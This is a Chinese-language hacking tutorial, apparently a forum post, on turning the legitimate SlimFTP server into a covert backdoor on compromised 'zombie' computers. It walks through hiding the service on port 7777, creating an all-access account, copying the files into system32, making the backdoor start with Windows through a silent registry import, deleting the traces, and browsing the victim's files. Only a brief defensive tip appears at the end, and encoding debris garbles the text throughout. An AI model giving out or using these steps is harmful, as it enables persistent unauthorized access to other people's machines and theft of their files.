|
|
一��、為何采用SlimFTP?
我們之所以會(huì)選擇SlimFTP���,是因?yàn)樗w積小、運(yùn)行隱蔽�、設(shè)置簡(jiǎn)單卻又能提供最基本的FTP服務(wù)。
在提供對(duì)入侵者而言最重要的上傳�、下載功能的同時(shí),SlimFTP還可根據(jù)入侵者的要求更改FTP服務(wù)端口���、設(shè)置用戶(hù)權(quán)限�����,并支持多用戶(hù)同時(shí)登錄(你可以和好友一起分享肉雞服務(wù))�。眾多功能集于一身����,SlimFTP對(duì)入侵一族來(lái)說(shuō)確實(shí)是一件利器。
在本文中��,筆者將以實(shí)例的形式進(jìn)行講解和操作(已經(jīng)取得肉雞的CMD命令提示符權(quán)限����,這是安裝SlimFTP的必備條件)���。
二、SlimFTP本地設(shè)置
本地設(shè)置相當(dāng)于給SlimFTP描繪了一幅入侵的藍(lán)圖讓它讀懂����,從而為進(jìn)一步進(jìn)駐肉雞做準(zhǔn)備。
配置步驟分為本地設(shè)置和服務(wù)器設(shè)置兩個(gè)部分�。本地設(shè)置操作包括設(shè)置FTP參數(shù)、添加用戶(hù)和權(quán)限等��,對(duì)于入侵者而言��,這是必須做的第一步�。而服務(wù)器設(shè)置則需要在肉雞上進(jìn)行操作,主要是完成服務(wù)的啟動(dòng)���。
1.修改配置文件
將程序壓縮包解壓到任意目錄���,直接用記事本打開(kāi)其中的SlimFTPd.conf文件(這是服務(wù)器信息配制文件)�����。
找到第二段英文中的關(guān)鍵字BindPort�,這就是端口設(shè)置的信息所在處���,后面的數(shù)字21,就是程序默認(rèn)的21端口�,這個(gè)端口是入侵者用來(lái)連接的端口。對(duì)于入侵者而言���,服務(wù)端口越隱蔽越好���,筆者在此將它設(shè)置為7777。
2.添加用戶(hù)
FTP服務(wù)的基本信息設(shè)置成功后��,我們就可以開(kāi)始添加用戶(hù)了��。在SlimFTPd.conf文件最下端我們可找到關(guān)鍵字“#”��,在其后添加用戶(hù)的格式為:
#
#password "密碼"
#Mount / FTP根目錄
#Allow / 控制權(quán)限
提示:擁有全部權(quán)限的代碼為ALL�。
例如,我們要建立一個(gè)擁有全部控制權(quán)限���,根目錄為D盤(pán)����,密碼為123456��,用戶(hù)名為cytkk的用戶(hù),則應(yīng)該按照以下格式進(jìn)行添加�。
#
#password "123456"
#Mount / d:\
#Allow / All
提示:為了使SlimFTP擁有自啟動(dòng)功能,我們可以手動(dòng)編寫(xiě)一段注冊(cè)表文件(壓縮包內(nèi)的FTP.reg)�����,使對(duì)方即使重新啟動(dòng)也無(wú)法擺脫控制���。三�����、讓SlimFTP在肉雞上安家
本地設(shè)置已經(jīng)完成����,現(xiàn)在我們要做的就是進(jìn)入肉雞的命令提示符下進(jìn)行最后的安裝操作����,也就是讓SlimFTPd在肉雞上安家并且啟動(dòng)FTP服務(wù)供我們使用。
將FTP.reg�����、SlimFTPd.exe�����、SlimFTPd.conf����、SlimFTPd.xml等4個(gè)文件都上傳到肉雞系統(tǒng)盤(pán)的system32目錄下。接著運(yùn)行指令“regedit.exe -s %SystemRoot%\system32\FTP.reg >nul”��,這樣一來(lái)����,F(xiàn)TP.reg里的內(nèi)容就被添加到注冊(cè)表里了,添加完畢后����,我們的SlimFTP在肉雞上就會(huì)跟隨系統(tǒng)啟動(dòng)而啟動(dòng)了。操作完成后�����,可別忘了刪除FTP.reg����。
至此,安裝工作就全部完成了,在肉雞重新啟動(dòng)之后�����,我們的FTP服務(wù)器就會(huì)隨之在后臺(tái)運(yùn)行��。
四��、享受肉雞����,三種烹調(diào)方式
通過(guò)前面的一番設(shè)置之后,后門(mén)FTP服務(wù)終于悄無(wú)聲息地在肉雞上運(yùn)行了���。此時(shí)���,迷惘的你還在為如何下載、修改文件而發(fā)愁?別急����,此時(shí)有三種烹調(diào)方式助你享受肉雞。
1.Web方式
Web方式依靠的就是瀏覽器內(nèi)置的FTP瀏覽功能����。
首先打開(kāi)瀏覽器,在地址信息欄中按照以下格式輸入登錄命令“FTP://用戶(hù)名:密碼@肉雞IP:SlimFTPd服務(wù)端口”,回車(chē)后即可在瀏覽器中看到肉雞硬盤(pán)上的文件�����。
2.FTP命令行方式
運(yùn)行本地機(jī)器的CMD��,在提示符下輸入命令“FTP”���。啟動(dòng)FTP控制臺(tái)后,在“FTP>”后輸入“open 61.***.***.106 7777”并回車(chē)����,會(huì)出現(xiàn)提示信息“Connected to 61.***.***.106”。稍等數(shù)秒�,會(huì)出現(xiàn)SlimFTP的歡迎信息,輸入用戶(hù)名“cytkk”和密碼“123456”即可成功登錄�。
FTP命令的操作與一些普通的指令相似,在此就不作過(guò)多的介紹了���。
3.FTP客戶(hù)端方式
這種方式對(duì)于攻擊者來(lái)說(shuō)是最直觀的���,所要利用的就是我們時(shí)常接觸的如FlashFXP、CutFTP一類(lèi)的程序��。
下面筆者就以FlashFXP為例來(lái)簡(jiǎn)單介紹一下。運(yùn)行FlashFXP主程序�����,在菜單欄中依次點(diǎn)擊“站點(diǎn)→站點(diǎn)管理器”����,將會(huì)出現(xiàn)如圖所示的“站點(diǎn)管理器”窗口。
在“站點(diǎn)管理器”窗口中���,站點(diǎn)名稱(chēng)可以任意填寫(xiě)����,在IP地址欄內(nèi)填寫(xiě)肉雞的IP地址(61.***.***.106)����,端口設(shè)置為7777,用戶(hù)名和密碼分別填寫(xiě)cytkk和123456即可�����。接下來(lái)�����,點(diǎn)擊“應(yīng)用→連接”,稍后將會(huì)在主界面的右側(cè)顯示出肉雞硬盤(pán)內(nèi)的所有文件�����,操作方式和使用本地的資源管理器一樣���,非常簡(jiǎn)單。 SlimFTP的出現(xiàn)�,完全解決了初級(jí)入侵者取得一只肉雞的權(quán)限后,進(jìn)一步獲取肉雞上的文件的技術(shù)“尷尬”�����。當(dāng)然���,SlimFTP本身是個(gè)合法的FTP程序��,如果你只想架設(shè)一個(gè)簡(jiǎn)單的FTP服務(wù)器�,那么SlimFTP也算得上是一個(gè)比較理想的選擇���。希望讀者朋友們可以多多挖掘身邊很多看似簡(jiǎn)單的軟件的另類(lèi)潛力�,說(shuō)不定經(jīng)過(guò)一定的DIY之后���,它就會(huì)成為你的入侵行動(dòng)中不可或缺的王牌�����。
防范方法
如果你發(fā)現(xiàn)自己的機(jī)器增開(kāi)了陌生的端口�����,或者在沒(méi)有網(wǎng)絡(luò)操作的時(shí)候出現(xiàn)巨大的網(wǎng)絡(luò)數(shù)據(jù)交換���,那么你的機(jī)器很可能已經(jīng)成為他人的囊中之物����。建議你使用超級(jí)兔子一類(lèi)的安全工具�����,將系統(tǒng)服務(wù)設(shè)置為默認(rèn)狀態(tài)�����,在重新啟動(dòng)之后�,黑客惡意添加的服務(wù)將會(huì)被終止運(yùn)行。
|
|
QQ好友和群
QQ空間
騰訊微博
騰訊朋友
收藏
淘帖
頂
踩
